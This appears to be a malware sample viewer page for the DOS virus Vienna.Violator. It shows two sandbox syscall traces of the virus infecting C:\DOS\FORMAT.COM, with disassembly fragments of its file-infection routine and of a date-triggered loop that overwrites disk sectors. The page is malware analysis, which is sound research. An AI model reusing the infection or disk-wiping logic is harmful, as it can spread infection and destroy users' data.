Sample viewer

vx.netlux.org/Virus.DOS.Vienna.Violator.821.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:34:55.256860892Z 255 PC: 13036 | UNKNOWN!
2018-12-17T22:34:55.259881379Z 42 PC: 13042 | Get date 0x13042: cmp cx, 0x7c7
0x13046: jb 0x13061
0x13048: jge 0x1304d
0x1304a: jmp 0x130a7
0x1304c: nop
0x1304d: mov ah, 0x2a
0x1304f: int 0x21
0x13051: cmp dh, 6
0x13054: jge 0x13059
0x13056: jmp 0x130a7
0x13058: nop
0x13059: cmp dl, 0x16
0x1305c: jge 0x1307f
0x1305e: jmp 0x130a7
0x13060: nop
0x13061: cmp cx, 0x7c6
0x13065: je 0x13074
0x13067: mov ah, 0x2b
0x13069: mov cx, 0x7c6
0x1306c: int 0x21
2018-12-17T22:34:55.261534743Z 42 PC: 13051 | Get date 0x13051: cmp dh, 6
0x13054: jge 0x13059
0x13056: jmp 0x130a7
0x13058: nop
0x13059: cmp dl, 0x16
0x1305c: jge 0x1307f
0x1305e: jmp 0x130a7
0x13060: nop
0x13061: cmp cx, 0x7c6
0x13065: je 0x13074
0x13067: mov ah, 0x2b
0x13069: mov cx, 0x7c6
0x1306c: int 0x21
0x1306e: mov ah, 0x2d
0x13070: mov cl, 1
0x13072: int 0x21
0x13074: mov ah, 0x2c
0x13076: int 0x21
0x13078: cmp cl, 0xf
0x1307b: jae 0x13089
2018-12-17T22:34:55.264176936Z 47 PC: 130ac | Get disk transfer address
2018-12-17T22:34:55.266524934Z 26 PC: 130bf | Set disk transfer address
2018-12-17T22:34:55.268152279Z 78 PC: 1314a | Find first file
2018-12-17T22:34:55.274518349Z 79 PC: 13150 | Find next file
2018-12-17T22:34:55.278016092Z 79 PC: 13150 | Find next file
2018-12-17T22:34:55.280737377Z 79 PC: 13150 | Find next file
2018-12-17T22:34:55.283637937Z 79 PC: 13150 | Find next file
2018-12-17T22:34:55.286560604Z 79 PC: 13150 | Find next file
2018-12-17T22:34:55.288985748Z 79 PC: 13150 | Find next file
2018-12-17T22:34:55.291356566Z 79 PC: 13150 | Find next file
2018-12-17T22:34:55.294974705Z 78 PC: 1314a | Find first file
2018-12-17T22:34:55.304463756Z 79 PC: 13150 | Find next file
2018-12-17T22:34:55.307497152Z 67 PC: 13189 | Get or set file attributes
2018-12-17T22:34:55.313343919Z 67 PC: 1319b | Get or set file attributes
2018-12-17T22:34:55.661066662Z 61 PC: 131a6 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-17T22:34:55.667838614Z 87 PC: 131b2 | Get or set file date and time
2018-12-17T22:34:55.669201077Z 44 PC: 131be | Get time 0x131be: mov ah, 0x3f
0x131c0: mov cx, 3
0x131c3: mov dx, 0x68
0x131c6: nop
0x131c7: add dx, si
0x131c9: int 0x21
0x131cb: jb 0x13223
0x131cd: cmp ax, 3
0x131d0: jne 0x13223
0x131d2: mov ax, 0x4202
0x131d5: mov cx, 0
0x131d8: mov dx, 0
0x131db: int 0x21
0x131dd: jb 0x13223
0x131df: mov cx, ax
0x131e1: sub ax, 3
0x131e4: mov word ptr [si + 0x6c], ax
0x131e8: add cx, 0x34d
0x131ec: mov di, si
0x131ee: sub di, 0x24b
2018-12-17T22:34:55.672535734Z 63 PC: 131cb | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:34:55.67798634Z 66 PC: 131dd | Move file pointer
2018-12-17T22:34:55.679288578Z 64 PC: 13202 | Write file or device (Write 821 bytes on handle 5)
2018-12-17T22:34:55.687410885Z 66 PC: 13214 | Move file pointer
2018-12-17T22:34:55.688813557Z 64 PC: 13223 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:34:55.691793937Z 87 PC: 13236 | Get or set file date and time
2018-12-17T22:34:55.694396581Z 62 PC: 1323a | Close file
2018-12-17T22:34:55.701500324Z 67 PC: 13249 | Get or set file attributes
2018-12-17T22:34:55.711032187Z 26 PC: 13256 | Set disk transfer address
2018-12-17T22:34:55.713678296Z 2 PC: 12bae | Character output (Char = '0d')
2018-12-17T22:34:55.715592488Z 2 PC: 12bae | Character output (Char = '0a')
2018-12-17T22:34:55.719066844Z 2 PC: 12bae | Character output (Char = '09')
2018-12-17T22:34:55.722301946Z 2 PC: 12bae | Character output (Char = '09')
2018-12-17T22:34:55.724750992Z 2 PC: 12bae | Character output (Char = '49')
2018-12-17T22:34:55.727115058Z 2 PC: 12bae | Character output (Char = '6e')
2018-12-17T22:34:55.729639945Z 2 PC: 12bae | Character output (Char = '74')
2018-12-17T22:34:55.731908218Z 2 PC: 12bae | Character output (Char = '65')
2018-12-17T22:34:55.734047417Z 2 PC: 12bae | Character output (Char = '6c')
2018-12-17T22:34:55.73614Z 2 PC: 12bae | Character output (Char = '6c')
2018-12-17T22:34:55.738700826Z 2 PC: 12bae | Character output (Char = '69')
2018-12-17T22:34:55.740999037Z 2 PC: 12bae | Character output (Char = '67')
2018-12-17T22:34:55.74332133Z 2 PC: 12bae | Character output (Char = '65')
2018-12-17T22:34:55.747831593Z 2 PC: 12bae | Character output (Char = '6e')
2018-12-17T22:34:55.749951441Z 2 PC: 12bae | Character output (Char = '74')
2018-12-17T22:34:55.751921486Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:55.754562433Z 2 PC: 12bae | Character output (Char = '56')
2018-12-17T22:34:55.756539189Z 2 PC: 12bae | Character output (Char = '69')
2018-12-17T22:34:55.758493168Z 2 PC: 12bae | Character output (Char = '72')
2018-12-17T22:34:55.761363307Z 2 PC: 12bae | Character output (Char = '75')
2018-12-17T22:34:55.76344907Z 2 PC: 12bae | Character output (Char = '73')
2018-12-17T22:34:55.765530325Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:55.768500628Z 2 PC: 12bae | Character output (Char = '42')
2018-12-17T22:34:55.770594229Z 2 PC: 12bae | Character output (Char = '61')
2018-12-17T22:34:55.772730637Z 2 PC: 12bae | Character output (Char = '69')
2018-12-17T22:34:55.776449397Z 2 PC: 12bae | Character output (Char = '74')
2018-12-17T22:34:55.77856672Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:55.780690009Z 2 PC: 12bae | Character output (Char = '53')
2018-12-17T22:34:55.783019334Z 2 PC: 12bae | Character output (Char = '79')
2018-12-17T22:34:55.785160251Z 2 PC: 12bae | Character output (Char = '73')
2018-12-17T22:34:55.787301678Z 2 PC: 12bae | Character output (Char = '74')
2018-12-17T22:34:55.790012467Z 2 PC: 12bae | Character output (Char = '65')
2018-12-17T22:34:55.792992857Z 2 PC: 12bae | Character output (Char = '6d')
2018-12-17T22:34:55.795111513Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:55.798173884Z 2 PC: 12bae | Character output (Char = '28')
2018-12-17T22:34:55.80030468Z 2 PC: 12bae | Character output (Char = '74')
2018-12-17T22:34:55.802409556Z 2 PC: 12bae | Character output (Char = '6d')
2018-12-17T22:34:55.804944613Z 2 PC: 12bae | Character output (Char = '29')
2018-12-17T22:34:55.807743293Z 2 PC: 12bae | Character output (Char = '2e')
2018-12-17T22:34:55.810084301Z 2 PC: 12bae | Character output (Char = '0d')
2018-12-17T22:34:55.812489705Z 2 PC: 12bae | Character output (Char = '0a')
2018-12-17T22:34:55.81704231Z 2 PC: 12bae | Character output (Char = '09')
2018-12-17T22:34:55.820716352Z 2 PC: 12bae | Character output (Char = '43')
2018-12-17T22:34:55.822970345Z 2 PC: 12bae | Character output (Char = '6f')
2018-12-17T22:34:55.82561261Z 2 PC: 12bae | Character output (Char = '70')
2018-12-17T22:34:55.82849455Z 2 PC: 12bae | Character output (Char = '79')
2018-12-17T22:34:55.83092774Z 2 PC: 12bae | Character output (Char = '72')
2018-12-17T22:34:55.834500072Z 2 PC: 12bae | Character output (Char = '69')
2018-12-17T22:34:55.837222205Z 2 PC: 12bae | Character output (Char = '67')
2018-12-17T22:34:55.83950255Z 2 PC: 12bae | Character output (Char = '68')
2018-12-17T22:34:55.842764887Z 2 PC: 12bae | Character output (Char = '74')
2018-12-17T22:34:55.845075081Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:55.847260223Z 2 PC: 12bae | Character output (Char = '28')
2018-12-17T22:34:55.850809698Z 2 PC: 12bae | Character output (Char = '63')
2018-12-17T22:34:55.853567772Z 2 PC: 12bae | Character output (Char = '29')
2018-12-17T22:34:55.856302644Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:55.859202972Z 2 PC: 12bae | Character output (Char = '43')
2018-12-17T22:34:55.861370625Z 2 PC: 12bae | Character output (Char = '6f')
2018-12-17T22:34:55.863359895Z 2 PC: 12bae | Character output (Char = '6d')
2018-12-17T22:34:55.865877176Z 2 PC: 12bae | Character output (Char = '70')
2018-12-17T22:34:55.867949954Z 2 PC: 12bae | Character output (Char = '2d')
2018-12-17T22:34:55.869998798Z 2 PC: 12bae | Character output (Char = '56')
2018-12-17T22:34:55.872531259Z 2 PC: 12bae | Character output (Char = '49')
2018-12-17T22:34:55.874446432Z 2 PC: 12bae | Character output (Char = '52')
2018-12-17T22:34:55.876525901Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:55.879747508Z 2 PC: 12bae | Character output (Char = '49')
2018-12-17T22:34:55.881932394Z 2 PC: 12bae | Character output (Char = '6e')
2018-12-17T22:34:55.884211569Z 2 PC: 12bae | Character output (Char = '63')
2018-12-17T22:34:55.894893314Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:55.897094797Z 2 PC: 12bae | Character output (Char = '31')
2018-12-17T22:34:55.899219266Z 2 PC: 12bae | Character output (Char = '39')
2018-12-17T22:34:55.90180088Z 2 PC: 12bae | Character output (Char = '39')
2018-12-17T22:34:55.903907936Z 2 PC: 12bae | Character output (Char = '36')
2018-12-17T22:34:55.905594255Z 2 PC: 12bae | Character output (Char = '2c')
2018-12-17T22:34:55.908781193Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:55.910872624Z 2 PC: 12bae | Character output (Char = '41')
2018-12-17T22:34:55.912870144Z 2 PC: 12bae | Character output (Char = '6c')
2018-12-17T22:34:55.915361376Z 2 PC: 12bae | Character output (Char = '6c')
2018-12-17T22:34:55.917570922Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:55.919735776Z 2 PC: 12bae | Character output (Char = '72')
2018-12-17T22:34:55.92263386Z 2 PC: 12bae | Character output (Char = '69')
2018-12-17T22:34:55.924945266Z 2 PC: 12bae | Character output (Char = '67')
2018-12-17T22:34:55.926935998Z 2 PC: 12bae | Character output (Char = '68')
2018-12-17T22:34:55.929569991Z 2 PC: 12bae | Character output (Char = '74')
2018-12-17T22:34:55.931737793Z 2 PC: 12bae | Character output (Char = '73')
2018-12-17T22:34:55.934534202Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:55.937121449Z 2 PC: 12bae | Character output (Char = '72')
2018-12-17T22:34:55.93922127Z 2 PC: 12bae | Character output (Char = '65')
2018-12-17T22:34:55.941365037Z 2 PC: 12bae | Character output (Char = '73')
2018-12-17T22:34:55.944282521Z 2 PC: 12bae | Character output (Char = '65')
2018-12-17T22:34:55.946289665Z 2 PC: 12bae | Character output (Char = '76')
2018-12-17T22:34:55.948734342Z 2 PC: 12bae | Character output (Char = '65')
2018-12-17T22:34:55.950971856Z 2 PC: 12bae | Character output (Char = '72')
2018-12-17T22:34:55.953799882Z 2 PC: 12bae | Character output (Char = '65')
2018-12-17T22:34:55.955823006Z 2 PC: 12bae | Character output (Char = '64')
2018-12-17T22:34:55.957917421Z 2 PC: 12bae | Character output (Char = '21')
2018-12-17T22:34:55.960404831Z 2 PC: 12bae | Character output (Char = '0d')
2018-12-17T22:34:55.962304413Z 2 PC: 12bae | Character output (Char = '0a')
2018-12-17T22:34:55.965650781Z 2 PC: 12bae | Character output (Char = '09')
2018-12-17T22:34:55.96956942Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:55.971615495Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:55.973692566Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:55.976196418Z 2 PC: 12bae | Character output (Char = '42')
2018-12-17T22:34:55.990606898Z 2 PC: 12bae | Character output (Char = '61')
2018-12-17T22:34:55.99275906Z 2 PC: 12bae | Character output (Char = '69')
2018-12-17T22:34:55.99561063Z 2 PC: 12bae | Character output (Char = '74')
2018-12-17T22:34:55.998026615Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:56.000379832Z 2 PC: 12bae | Character output (Char = '66')
2018-12-17T22:34:56.004017339Z 2 PC: 12bae | Character output (Char = '69')
2018-12-17T22:34:56.0060504Z 2 PC: 12bae | Character output (Char = '6c')
2018-12-17T22:34:56.0082425Z 2 PC: 12bae | Character output (Char = '65')
2018-12-17T22:34:56.010601743Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:56.012778068Z 2 PC: 12bae | Character output (Char = '23')
2018-12-17T22:34:56.014935993Z 2 PC: 12bae | Character output (Char = '31')
2018-12-17T22:34:56.017793329Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:56.019892051Z 2 PC: 12bae | Character output (Char = '28')
2018-12-17T22:34:56.022234238Z 2 PC: 12bae | Character output (Char = '2e')
2018-12-17T22:34:56.025034983Z 2 PC: 12bae | Character output (Char = '43')
2018-12-17T22:34:56.027499937Z 2 PC: 12bae | Character output (Char = '4f')
2018-12-17T22:34:56.02984138Z 2 PC: 12bae | Character output (Char = '4d')
2018-12-17T22:34:56.032584181Z 2 PC: 12bae | Character output (Char = '29')
2018-12-17T22:34:56.034756087Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:56.036991008Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:56.03992701Z 2 PC: 12bae | Character output (Char = '4f')
2018-12-17T22:34:56.042102502Z 2 PC: 12bae | Character output (Char = '72')
2018-12-17T22:34:56.044336983Z 2 PC: 12bae | Character output (Char = '67')
2018-12-17T22:34:56.047240792Z 2 PC: 12bae | Character output (Char = '69')
2018-12-17T22:34:56.049566204Z 2 PC: 12bae | Character output (Char = '6e')
2018-12-17T22:34:56.051922263Z 2 PC: 12bae | Character output (Char = '61')
2018-12-17T22:34:56.054933237Z 2 PC: 12bae | Character output (Char = '6c')
2018-12-17T22:34:56.057273613Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:56.059700766Z 2 PC: 12bae | Character output (Char = '73')
2018-12-17T22:34:56.062931106Z 2 PC: 12bae | Character output (Char = '69')
2018-12-17T22:34:56.065334841Z 2 PC: 12bae | Character output (Char = '7a')
2018-12-17T22:34:56.067801686Z 2 PC: 12bae | Character output (Char = '65')
2018-12-17T22:34:56.070740749Z 2 PC: 12bae | Character output (Char = '3a')
2018-12-17T22:34:56.07277264Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:56.075104395Z 2 PC: 12bae | Character output (Char = '31')
2018-12-17T22:34:56.078245253Z 2 PC: 12bae | Character output (Char = '35')
2018-12-17T22:34:56.080511863Z 2 PC: 12bae | Character output (Char = '30')
2018-12-17T22:34:56.082688492Z 2 PC: 12bae | Character output (Char = '30')
2018-12-17T22:34:56.086785146Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:56.088427044Z 2 PC: 12bae | Character output (Char = '62')
2018-12-17T22:34:56.090759671Z 2 PC: 12bae | Character output (Char = '79')
2018-12-17T22:34:56.093390212Z 2 PC: 12bae | Character output (Char = '74')
2018-12-17T22:34:56.095756397Z 2 PC: 12bae | Character output (Char = '65')
2018-12-17T22:34:56.098089063Z 2 PC: 12bae | Character output (Char = '73')
2018-12-17T22:34:56.100862354Z 2 PC: 12bae | Character output (Char = '0d')
2018-12-17T22:34:56.102724725Z 2 PC: 12bae | Character output (Char = '0a')
2018-12-17T22:34:56.106192201Z 2 PC: 12bae | Character output (Char = '0a')
2018-12-17T22:34:56.110208294Z 61 PC: 12a69 | Open file (Filename = 'A:\TEST.EXE')
2018-12-17T22:34:56.116646302Z 63 PC: 12a69 | Read file or device (Read 24 bytes on handle 5)
2018-12-17T22:34:56.119205949Z 62 PC: 12a69 | Close file
2018-12-17T22:34:56.12127497Z 2 PC: 12bae | Character output (Char = '56')
2018-12-17T22:34:56.123631522Z 2 PC: 12bae | Character output (Char = '49')
2018-12-17T22:34:56.125899932Z 2 PC: 12bae | Character output (Char = '52')
2018-12-17T22:34:56.129058301Z 2 PC: 12bae | Character output (Char = '55')
2018-12-17T22:34:56.13138708Z 2 PC: 12bae | Character output (Char = '53')
2018-12-17T22:34:56.133937115Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:56.136953189Z 2 PC: 12bae | Character output (Char = '52')
2018-12-17T22:34:56.140321621Z 2 PC: 12bae | Character output (Char = '45')
2018-12-17T22:34:56.142817297Z 2 PC: 12bae | Character output (Char = '4c')
2018-12-17T22:34:56.145329514Z 2 PC: 12bae | Character output (Char = '45')
2018-12-17T22:34:56.147640672Z 2 PC: 12bae | Character output (Char = '41')
2018-12-17T22:34:56.15019355Z 2 PC: 12bae | Character output (Char = '53')
2018-12-17T22:34:56.153389654Z 2 PC: 12bae | Character output (Char = '45')
2018-12-17T22:34:56.155798025Z 2 PC: 12bae | Character output (Char = '44')
2018-12-17T22:34:56.159552728Z 2 PC: 12bae | Character output (Char = '21')
2018-12-17T22:34:56.16225601Z 2 PC: 12bae | Character output (Char = '21')
2018-12-17T22:34:56.163739183Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:56.16532831Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:56.167724112Z 2 PC: 12bae | Character output (Char = '49')
2018-12-17T22:34:56.169868631Z 2 PC: 12bae | Character output (Char = '74')
2018-12-17T22:34:56.172956928Z 2 PC: 12bae | Character output (Char = '27')
2018-12-17T22:34:56.175606242Z 2 PC: 12bae | Character output (Char = '73')
2018-12-17T22:34:56.17792113Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:56.18096309Z 2 PC: 12bae | Character output (Char = '6e')
2018-12-17T22:34:56.183577574Z 2 PC: 12bae | Character output (Char = '61')
2018-12-17T22:34:56.185904486Z 2 PC: 12bae | Character output (Char = '6d')
2018-12-17T22:34:56.18873849Z 2 PC: 12bae | Character output (Char = '65')
2018-12-17T22:34:56.191094023Z 2 PC: 12bae | Character output (Char = '20')
2018-12-17T22:34:56.193134008Z 2 PC: 12bae | Character output (Char = '69')
2018-12-17T22:34:56.19637704Z 2 PC: 12bae | Character output (Char = '73')
2018-12-17T22:34:56.198636207Z 2 PC: 12bae | Character output (Char = '3a')
2018-12-17T22:34:56.200892669Z 2 PC: 12bae | Character output (Char = '0d')
2018-12-17T22:34:56.203608646Z 2 PC: 12bae | Character output (Char = '0a')
2018-12-17T22:34:56.207262781Z 2 PC: 12bae | Character output (Char = '0a')
2018-12-17T22:34:56.210910492Z 2 PC: 12bae | Character output (Char = '07')
2018-12-17T22:34:56.213541029Z 9 PC: 12b93 | Display string (String= 'This file has not had the INJECT.EXE run on it to load the Virus name into it ')
2018-12-17T22:34:56.219887923Z 76 PC: 12a69 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6255,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:58.510139781Z 255 PC: 13036 | UNKNOWN!
2018-12-25T11:58:58.511978911Z 42 PC: 13042 | Get date 0x13042: cmp cx, 0x7c7
0x13046: jb 0x13061
0x13048: jge 0x1304d
0x1304a: jmp 0x130a7
0x1304c: nop
0x1304d: mov ah, 0x2a
0x1304f: int 0x21
0x13051: cmp dh, 6
0x13054: jge 0x13059
0x13056: jmp 0x130a7
0x13058: nop
0x13059: cmp dl, 0x16
0x1305c: jge 0x1307f
0x1305e: jmp 0x130a7
0x13060: nop
0x13061: cmp cx, 0x7c6
0x13065: je 0x13074
0x13067: mov ah, 0x2b
0x13069: mov cx, 0x7c6
0x1306c: int 0x21
2018-12-25T11:58:58.513851781Z 44 PC: 13078 | Get time 0x13078: cmp cl, 0xf
0x1307b: jae 0x13089
0x1307d: jmp 0x1304d
0x1307f: mov ah, 9
0x13081: mov dx, si
0x13083: add dx, 0x40
0x13087: int 0x21
0x13089: cmp byte ptr [si], 0x1a
0x1308e: ja 0x130a7
0x13090: pushf
0x13091: mov al, byte ptr [si]
0x13095: mov cx, 0x100
0x13098: mov dx, 0
0x1309b: mov bx, 1
0x1309e: int 0x26
0x130a0: popf
0x130a1: inc byte ptr [si]
0x130a5: jmp 0x13089
0x130a7: push es
0x130a8: mov ah, 0x2f
2018-12-25T11:58:58.516481113Z 47 PC: 130ac | Get disk transfer address
2018-12-25T11:58:58.518507041Z 26 PC: 130bf | Set disk transfer address
2018-12-25T11:58:58.520489589Z 78 PC: 1314a | Find first file
2018-12-25T11:58:58.526368058Z 79 PC: 13150 | Find next file
2018-12-25T11:58:58.528430382Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.531345951Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.533826178Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.535712789Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.537804273Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.539547469Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.541298664Z 78 PC: 1314a | Find first file (See above)
2018-12-25T11:58:58.550764389Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.553548193Z 67 PC: 13189 | Get or set file attributes
2018-12-25T11:58:58.559410283Z 67 PC: 1319b | Get or set file attributes
2018-12-25T11:58:59.420898763Z 61 PC: 131a6 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:58:59.42754819Z 87 PC: 131b2 | Get or set file date and time
2018-12-25T11:58:59.428757068Z 44 PC: 131be | Get time 0x131be: mov ah, 0x3f
0x131c0: mov cx, 3
0x131c3: mov dx, 0x68
0x131c6: nop
0x131c7: add dx, si
0x131c9: int 0x21
0x131cb: jb 0x13223
0x131cd: cmp ax, 3
0x131d0: jne 0x13223
0x131d2: mov ax, 0x4202
0x131d5: mov cx, 0
0x131d8: mov dx, 0
0x131db: int 0x21
0x131dd: jb 0x13223
0x131df: mov cx, ax
0x131e1: sub ax, 3
0x131e4: mov word ptr [si + 0x6c], ax
0x131e8: add cx, 0x34d
0x131ec: mov di, si
0x131ee: sub di, 0x24b
2018-12-25T11:58:59.431548018Z 63 PC: 131cb | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:58:59.436811336Z 66 PC: 131dd | Move file pointer
2018-12-25T11:58:59.438073052Z 64 PC: 13202 | Write file or device (Write 821 bytes on handle 5)
2018-12-25T11:58:59.536949731Z 66 PC: 13214 | Move file pointer
2018-12-25T11:58:59.538354537Z 64 PC: 13223 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:58:59.541490138Z 87 PC: 13236 | Get or set file date and time
2018-12-25T11:58:59.544044861Z 62 PC: 1323a | Close file
2018-12-25T11:58:59.555302813Z 67 PC: 13249 | Get or set file attributes
2018-12-25T11:58:59.565137697Z 26 PC: 13256 | Set disk transfer address
2018-12-25T11:58:59.567179205Z 2 PC: 12bae | Character output (Char = '0d')
2018-12-25T11:58:59.569506916Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.573316491Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.576174962Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.579257008Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.581673433Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.584397089Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.586807429Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.589199384Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.592473752Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.594995455Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.597499227Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.600518982Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.602872103Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.605216455Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.608315872Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.61042547Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.61249815Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.615353974Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.617512597Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.619562396Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.622361174Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.62588906Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.629109319Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.632146903Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.634421175Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.63637429Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.639007942Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.641085754Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.643261229Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.646119763Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.650415868Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.652607233Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.655409854Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.659187143Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.661562876Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.66472965Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.667273681Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.670130419Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.672862829Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.676504913Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.680083776Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.682475491Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.685238471Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.687567832Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.690152447Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.692603017Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.694963408Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.69750885Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.700002728Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.702380067Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.704964561Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.708373613Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.710723174Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.713408614Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.71602676Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.718289724Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.720954652Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.723429194Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.725788434Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.728351286Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.731830901Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.734192674Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.736747696Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.739784285Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.742102723Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.744443011Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.75468925Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.757910483Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.759992426Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.76211363Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.764344849Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.766440301Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.768660585Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.770672746Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.772270097Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.774350909Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.776309937Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.77787315Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.780735721Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.782686259Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.784178602Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.786190893Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.787813589Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.789367534Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.791532012Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.793223284Z 2 PC: 12bae | Character output (See above)
